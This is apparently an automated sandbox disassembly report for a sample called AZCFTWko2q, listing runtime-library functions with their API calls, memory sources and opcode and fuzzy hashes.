                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00405503
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00405534
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 0040554A
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405568
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                                      • Instruction ID: 21a092b80c120d3a1799ad65edf81cfe58c90a4d0a542ae4cd53e0a409a0227e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 10913962cff3651302842d72b7cb42c766a1b7b0878e2d3a054d6c0589329772
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A711AC72D10628ABCB15EBA4C801AAE7774EF44318F14053EE811BB2D2DB389A058F9C
                                                                                                                                                                                                                                                                                      Function 0040556E Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040557F
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00405596
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 0040559F
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 004055D0
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 004055E6
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00405604
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                                      • Instruction ID: 21547056dedd0a357f918a94d9d64b27cd1eadba8e4608574907870a271d474c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8330ae3b68186870bdfbd2c21a05cb33b5aede15e19bdae88c6f234de43f936
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D119E72900628EBCB15EBA5C841AEEB370EF04314F14453FE811BB2D2DB789A058B9C
                                                                                                                                                                                                                                                                                      Function 00404C14 Relevance: 9.1, APIs: 6, Instructions: 51COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00404C25
                                                                                                                                                                                                                                                                                      • int.LIBCPMT ref: 00404C3C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::_Lockit.LIBCPMT ref: 0040BD6D
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BD5C: std::_Lockit::~_Lockit.LIBCPMT ref: 0040BD87
                                                                                                                                                                                                                                                                                      • std::locale::_Getfacet.LIBCPMT ref: 00404C45
                                                                                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 00404C76
                                                                                                                                                                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00404C8C
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00404CAA
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetRegisterThrowstd::locale::_
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2243866535-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction ID: 1aa241efc112286da59c73bb00310cdec327cb4216d8ea75c5d160ea2c1741d7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8360cf2ad30bdfb21b7e95981d287bcfb384644201decadf3b6eee33653b9c52
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5311E0B2C002289BCB11EBA0C801AEE7774AF44318F10053FE911BB2D1CB389E058B98
                                                                                                                                                                                                                                                                                      Function 00404E63 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __EH_prolog3_GS.LIBCMT ref: 00404E6A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404EB5
                                                                                                                                                                                                                                                                                      • __Getcoll.LIBCPMT ref: 00404EC4
                                                                                                                                                                                                                                                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404ED4
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                                      • String ID: fJ@
                                                                                                                                                                                                                                                                                      • API String ID: 1836011271-3478227103
                                                                                                                                                                                                                                                                                      • Opcode ID: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                                      • Instruction ID: b09a35a98a06b47a9133a0f6fd6c3c5fe655fd81b24a3011873ef7005f6a19eb
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c526677c734dc493626db39d482cf98f5f5362d0ee08f882613185e0243459e5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 160157719002089FDB00EFA5C481B9EB7B0BF80318F10857EE045AB6C1CB789A84CB99
                                                                                                                                                                                                                                                                                      Function 0042FEE4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002), ref: 0042FF04
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0042FF17
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,0042FE95,00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000), ref: 0042FF3A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                      • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                      • Opcode ID: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                                      • Instruction ID: 2c645cf7ccd09daad3cc37133732e5cb7e12e7ad02a2fd82027b287817b89b2c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a7c01f4cf2846fc1278f2b92eb4297b36712501a434ecdb6ef0bfa768b076a5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                                                                      Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                                                                      • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                      • String ID: pScheduler
                                                                                                                                                                                                                                                                                      • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                                                      • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                                                                      Function 025008F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                                                                      • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                                                                      • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                                                                      • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                                      • Instruction ID: bd152b798cf6f8a0df14c9356a8a7b29a540e91e1a784b929591004c23cbfb57
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6BF03CB1A00514DFEB16FB65C84076C3B66BF25B05F468496E441AB2E0CB789A48CFA5
                                                                                                                                                                                                                                                                                      Function 024EB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                                      • Instruction ID: 5fc2b0679644f4f98b17eb1138936cfb410cea8dbf02140d58aa55a824ac31da
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D171B5719002169BEF21CF59C884ABFBB75FF4572EF64466BE41367280DB708942CBA1
                                                                                                                                                                                                                                                                                      Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                                      • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                                                                      Function 024F0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                      • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                                      • Instruction ID: a1d7f9c6ac35f1cf8b87ceeeb3d2430f2b419e7d626d5d2ff3ddd80ffd887a0f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9551A072A00305AFDBA19F2AD841B6BB7F5EFC8724B14156EEA09D7255E731E901CB80
                                                                                                                                                                                                                                                                                      Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                                                                      • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                                      • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                                                                      Function 024F1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                                      • Instruction ID: bc61ed7c781782cb2f9cb14b803ddee5f6add24aa248f1772753f32055a27a18
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D641DE36A00204DFDB60DF79C980A9EB7E6EF89714F1545AADA19EB381D731E901CB80
                                                                                                                                                                                                                                                                                      Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                                      • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                                      Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                                      • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                                        • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 313313983-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                                      • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                                      Function 024DB12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _SpinWait.LIBCONCRT ref: 024DB152
                                                                                                                                                                                                                                                                                        • Part of subcall function 024D1188: _SpinWait.LIBCONCRT ref: 024D11A0
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024DB166
                                                                                                                                                                                                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024DB198
                                                                                                                                                                                                                                                                                      • List.LIBCMT ref: 024DB21B
                                                                                                                                                                                                                                                                                      • List.LIBCMT ref: 024DB22A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3896159293.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_24c0000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                                      • Instruction ID: fe81078b9b9c93e447e2a370094fa9cdf0579522588042eb0364f93c55b3571f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 95314332A00656EFCB16EFA5C9A06EEBBB2FF05348F06406FC8156B641CB716904CF94
                                                                                                                                                                                                                                                                                      Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                                      • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                                      • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                                      • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                                      • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.3894863355.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_AZCFTWko2q.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                                      • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
